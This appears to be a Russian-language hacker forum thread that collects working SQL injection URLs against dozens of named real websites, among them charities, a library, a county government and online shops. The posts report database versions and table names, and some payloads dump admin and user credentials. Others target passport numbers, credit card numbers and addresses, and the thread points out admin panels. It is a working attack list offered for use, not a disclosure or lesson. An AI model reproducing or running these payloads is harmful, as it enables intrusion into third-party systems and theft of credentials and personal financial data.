SQL Инъекции

openheartsopenminds.org.uk

Code:

http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,version(),5,6+--+

Version: 5.0.45-community-nt
Database: sitesplus
User: sitesplus@localhost

Таблицы:

Code:

http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,table_name,5,6+from+information_schema.tables+limit+0,1+--+

Присутствует таблица tb_users, столбцы:
user_id
site_id
user_name
user_password
expired

Code:

http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,concat(user_name,0x5A,user_password),5,6+from+tb_users+limit+0,1+--+

Всего 481 аккаунт.

 

MySQL 5.0.45-community-log
http://www.patfalvey.com/viewnews.php?id=-4+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name=0x6d656d626572--
member::m_id,m_name,m_subscribed,m_unsubscribed,m_email
http://www.patfalvey.com/viewnews.php?id=-4+union+select+1,2,concat_ws(0x0b,m_id,0x3a,m_name,0x3a,m_subscribed,0x3a,m_unsubscribed,0x3a,m_email),4,5,6,7+from+member--
выводит все строки сразу.
Вывод ошибок отключен.

 

Code:

http://www.artero.ru/album.php?p=1&n=530)+and+null+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9%23

Code:

[email protected]:db0743811:5.0.51a

 

esamiafrica@localhost:4.1.20:esamiafrica_site

Code:

http://www.esami-africa.org/research.php?id=-61+union+select+concat_ws(0x3a,id,username,pword)+from+admin--

Жаль хэшык неразбрутил(... кому удастся отпишитесь плиз....

 

http://www.labgear.co.uk/news.php?nid=2+union+select+column_name,2+from+information_schema.columns+where+table_name=0x6c6162676561725f
labgear_users::users_id:users_name:users_pass
http://www.labgear.co.uk/news.php?nid=2+union+select+concat_ws(0x3a,users_id,users_name,users_pass),2+from+labgear_users
________
http://www.labgear.co.uk/news.php?nid=2+union+select+column_name,2+from+information_schema.columns+where+table_name=0x70687062625f7573657273
phpbb_users::user_id:username:user_password
http://www.labgear.co.uk/news.php?nid=2+union+select+concat_ws(0x3a,user_id,username,user_password),2+from+phpbb_users

MySQL 5.0.77-log
выводит все строки сразу

 

1.

http://www.thestream.tv/series.php?s=-1+and+1=0+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables--+-​

2. и намного более извращённый вариант, но интересный =)
инъект в 18 поле инъекта.
разделитель - %0А - перевод строки

2
union
select
1,2,table_name,4,5,6,7,8,9,10
from
information_schema.tables
#
​

в hex.
вывод information_schema

http://www.thestream.tv/watch.php?v=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,0x320A756E696F6E0A73656C6563740A312C322C7461626C655F6E616D652C342C352C362C372C382C392C31300A66726F6D0A696E666F726D6174696F6E5F736368656D612E7461626C65730A23,19,20,21,22,23,24,25,26--+-​

 

152 колонки
PR5 тИЦ40

Code:

http://www.skbcases.com/music/products/proddetail.php?c=85&id=431+and+1=0+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152--

4.0.12-standard-log:skbcases@localhost:skbcases

 

http://bam-boo.mobi/news.php?page=&year=2009&nid=2+union+select+1,column_name,3+from+information_schema.columns+where+table_name=0x61646d696e
admin::login,password,work
MySQL 5.0.51a-24+lenny1-log
http://bam-boo.mobi/news.php?page=&year=2009&nid=2+union+select+1,concat_ws(0x3a,login,password,work),3+from+admin

 

yizkor.nypl.org

Вашему вниманию предлагаю базу данных Оракул!

Code:

http://yizkor.nypl.org/index.php?id=-1158+union+select+null,user,null,null,null,null,null,null,null,null,null,null+from+sys.dual+--+

User: YIZKOR

Удалось вывести парочку таблиц:
NYPL_YIZKOR_BOOKS
DUAL
DEF$_TEMP$LOB

Code:

http://yizkor.nypl.org/index.php?id=-1158+union+select+null,table_name,null,null,null,null,null,null,null,null,null,null+from+sys.all_tables+where+rownum+<=+5+--+

P.S. Вывод данных осуществляется в столбик, который к сожалению визуально не видно. Но по скольку мы крутые ребята, то открываем исходник. Находим строку

на первой же странице, листать далеко не надо. Именно между кавычек и осуществляется вывод информации Вот так вот.

 

PR4

Code:

http://www.managingmoney.com/lc_card_main.php?id=-100552720/**/union/**/select/**/1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105/*

4.1.22-standard-log:cardoffers:[email protected]
PR4

Code:

http://www.thealbany.org.uk/whatson_music_detail.php?ID=-344/**/union/**/select/**/1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/members--+

5.0.77-log:[email protected]:so_uk_net

 

waterandclimate.org

Code:

http://www.waterandclimate.org/?id=news_details&nid=-93+union+select+1,2,3,concat(version(),0x3A3A,user(),0x3A3A,database()),5,6,7,8,9,10,11+--+

Version: 5.0.21-community
User: [email protected]
Database: wac
OS: Win32

Таблицы:

Code:

http://www.waterandclimate.org/?id=news_details&nid=-93+union+select+1,2,3,table_name,5,6,7,8,9,10,11+from+information_schema.tables+limit+0,1+--+

Присутствует таблица members:
mid
fname
lname
organization
country

Но к сожалению в ней особо ничего полезного нету.

 

PR6
http://www.artidea.org/event.php?id=999+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--

System information:
-----------------------------------------
basedir:/usr/
base:artidea_db1
user:ai_db_user@localhost
os:redhat-linux-gnu
ver:5.0.45
datadir:/var/lib/mysql/
tmpdir:/tmp/

[ username,password,id ] from [ artidea_db1.admin_users ]
-----------------------------------------

Сорри.. Больше так не буду )

 

http://www.barnstablecounty.org/viewnews.php?id=-4+union+select+1,2,3,group_concat(0x0b,column_name)+from+information_schema.columns+where+table_name=0x7573657273
users::username,password,userid,userlevel,email,timestamp
http://www.barnstablecounty.org/viewnews.php?id=-4+union+select+1,2,3,group_concat(0x0b,username,0x3a,password,0x3a,email,0x3a,userlevel)+from+users
MySQL 5.0.51b-community-nt
admin panel: http://www.barnstablecounty.org/admin.php

===============================================================
MySQL 5.0.81-community-log
http://www.goodmarket.com.ua/news.php?id=-4+union+select+1,2,group_concat(0x0b,column_name),4+from+information_schema.columns+where+table_name=0x6372656469745f7573657273
credit_users::id:user_mail:user_passassport_numberassport_series
http://www.goodmarket.com.ua/news.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,user_mail,0x3a,user_pass,0x3a,passport_number,0x3a,passport_series),4+from+credit_users

 

http://fin.org.ua/newws.php?i=-721023+union+select+unhex(hex(concat_ws(0x3a,user_id,username,userpass))),2,3,4,5,6+from+poll_user--

http://fin.org.ua/newws.php?i=-721023+union+select+unhex(hex(concat_ws(0x3a,a_login,a_pass,a_surname,a_name))),2,3,4,5,6+from+admer--

 

semiramidasales.com

Code:

http://semiramidasales.com/borovets/gallery_view.php?gallery_id=5+union+all+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4--

Version: 5.0.77
User: semiramidasales@localhost
Database: semiramidasales

automaticgates.co.uk

Code:

http://www.automaticgates.co.uk/gallery_view.php?gallery_id=-99999+union+all+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5--

Version: 5.0.81-community
User: rogerw_agssite@localhost
Database: rogerw_ags

 

PG SQL

Code:

http://www.agetop.go.gov.br/index.php?idMateria=1+and+1=version()::int

PostgreSQL 8.1.5 on i386-pc-solaris2.10, compiled by GCC gcc (GCC) 3.4.6

 

u70375524@cgihost:d60343682:5.0.77-log

Code:

http://curlingwarmers.com/view_product.php?id=-24+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15--

dearpret_blog@localhost:dearpret_dearpretty:5.0.81-community

Code:

http://www.dearpretty.com/view_product.php?id=-29+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12--

alcolor_gvam@localhost:alcolor_alcolor:4.1.22-standard-log

Code:

http://www.alcolor.com/view_product.php?pid=4&id=-15+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8--

[email protected]:jhatsproddb:5.0.32-Debian_7etch6-log

Code:

http://jhats.com/view_product.php?prod_id=-105+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--

 

http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,column_name),4,5,6,7+from+information_schema.columns+where+table_name=0x7765625f7573657273--
web_users::id:imerezime:adresa:zemlja:email:br_kreditne:telefon:aktivanassword:username:rabat:zip:mjesto
http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,ime,0x3a,adresa,0x3a,zemlja,0x3a,email,0x3a,br_kreditne,0x3a,telefon,0x3a,aktivan,0x3a,password,0x3a,username,0x3a,rabat,0x3a,zip,0x3a,mjesto),4,5,6,7+from+web_users
________________________________________________________
http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,column_name),4,5,6,7+from+information_schema.columns+where+table_name=0x7573657273--
users::id:usernameasswordwd_token:admin:name:lastnamerivs:email
http://www.aura-maris.com/novosti.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,username,0x3a,password,0x3a,admin,0x3a,email),4,5,6,7+from+users
admin panel: http://www.aura-maris.com/admin/
MySQL 5.0.81-community-log

 

www.fishcom.ru

Code:

http://www.fishcom.ru/page.php?r=35'+union+select+1,2,3,4,5,6,concat_ws(0x20,user_login,user_password),8,9,10,11,12,13,14+from+cms_users/*

 

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,DATABASE(),4,5,6,7,8+--+
cida_ge

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,VERSION(),4,5,6,7,8+--+
5.0.51-log

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,USER(),4,5,6,7,8+--+
cida_ge@localhost

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+42,1+--+
user

http://www.cida.ge/eng/articles.php?id=124+and+0+union+select+1,2,passwd,4,5,name,7,8+from+user+--+